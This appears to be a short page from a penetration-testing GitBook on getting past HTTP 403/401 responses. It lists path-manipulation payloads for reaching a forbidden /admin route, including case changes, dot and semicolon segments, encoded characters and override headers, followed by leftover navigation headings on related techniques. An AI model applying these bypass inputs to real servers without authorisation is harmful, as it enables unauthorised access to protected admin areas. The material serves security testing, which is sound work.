Bypass 403 / 401
Various bypass tricks and tools
/admin -> 403 or 302
/Admin
/AdMin
/admin/
/admin/.
//admin//
/.;/admin
/./admin/..
/admin.json
/;/admin
//;//admin
/admi%6e [n is url encoded to %6e]
/%2e/admin
/admin#
/admin;/
/admin/~
/./admin/./
/admin?param
/admin..;/
/admin%20
/admin%09
/admin/..;/
/static../admin.jsp
/admin..;/
/../admin
/..;/admin
X-Originial-URL: /admin
X-Override-URL: /admin
X-Rewrite-URL: /admin

Capitalize the path
Add Suffix
URL encoding
Spring framework
API - IDOR
IDORGit
Wordpress
Burp Extensions - 403 Bypasser

HTTP Verb Tampering
HTTP Verb Tampering
Fuzz
Payload List

Content-Length:0
403 Header Bypass
Parameter Tampering
Null Byte Injection
HTTP Version Downgrade
Bypass Origin
Tools
Resources
Interesting Books
Interesting BooksSupport this Gitbook
Last updated
